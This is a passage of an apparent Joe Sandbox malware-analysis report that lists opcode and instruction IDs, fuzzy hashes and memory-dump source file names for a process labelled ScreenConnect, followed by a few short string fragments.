                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4010075A18A4A8FDF84EF28C494AA533E1FFAD745B140568D41DC7286CB35E842CB41
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 665fb661ce39a2a1e3c7fd91579c967a025ab232ae9224404a734d9f7a3af963
                                                                                                                                                                                                                                                          • Instruction ID: a5b348de3ca81a16f5e9480b15059ce00d162c6908461ee412709b518f1b1fa3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 665fb661ce39a2a1e3c7fd91579c967a025ab232ae9224404a734d9f7a3af963
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDF0AF218486CD6FE702AB7498191F9BFF1EF85211F4801E6D848C6193DF256959C751
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 79bbd03f6284d800b39a9644a4c4c50c514c52fb22b01c8e05a68b4fb5ae1c06
                                                                                                                                                                                                                                                          • Instruction ID: db6f26e62edd6f9546c8121f24cddab3e7069f660481893982ccc365f739947f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79bbd03f6284d800b39a9644a4c4c50c514c52fb22b01c8e05a68b4fb5ae1c06
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18E09BB114D50C6EA61CAA55EC479F7379CF747134F00111FE18E82002F152B52382A5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 651921d4a7cccc029fac5ba19085b7cb8ab17de41973d27ad3e3748c61c05c59
                                                                                                                                                                                                                                                          • Instruction ID: 5913bdfaf3bbc6ff753bb1d9722ec6af6cb6f5c31330495eeed9dc161d3369b9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 651921d4a7cccc029fac5ba19085b7cb8ab17de41973d27ad3e3748c61c05c59
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30F0F431E4491E8FEBA4EA189449BE8B3B1FB58352F1000B9D00DD3151CF396981CB00
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 51ec6c69e0d91645be45767539598a5db9f0b11531d9690db4e6f5e575f8a80b
                                                                                                                                                                                                                                                          • Instruction ID: cf145bc405228a8e4e3149d440c991f72dea6864b536295aafca5cc3cc5abdbc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51ec6c69e0d91645be45767539598a5db9f0b11531d9690db4e6f5e575f8a80b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EEF0653584C68C9FCB46DB74D4918D57FB0FE16325B0501D7E049CB053D7219A59CB82
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f27159151fb810f9836516ff2bc4e015ce9c8b02d49182c4330c95e540c3f2f9
                                                                                                                                                                                                                                                          • Instruction ID: 2e907c0774cbe6a0b748ca54821b302d507ee04a564afa5bd1e8c08a7c90cee9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f27159151fb810f9836516ff2bc4e015ce9c8b02d49182c4330c95e540c3f2f9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCE0DF6150E7C50FDB479B3898A88E03FA0EE1722170941EBD485CF0B3E6188A8AC752
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b3d0f0e01008be7da978a5514f169ef807f034c772ee14b3483b5b47503ffbe5
                                                                                                                                                                                                                                                          • Instruction ID: 1326f8a424d8acb173adf7014f8f57d3c647aa274eb454e2547fb8a307181333
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3d0f0e01008be7da978a5514f169ef807f034c772ee14b3483b5b47503ffbe5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08E0C2259DD90703FB6CA27678513F964D1BF05392F0A41BAE40DC00C5CF6CAD80C256
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
Strings
• String ID: B)$Jr$Jr$Jr$Jr$Jr
• API String ID: 0-757641468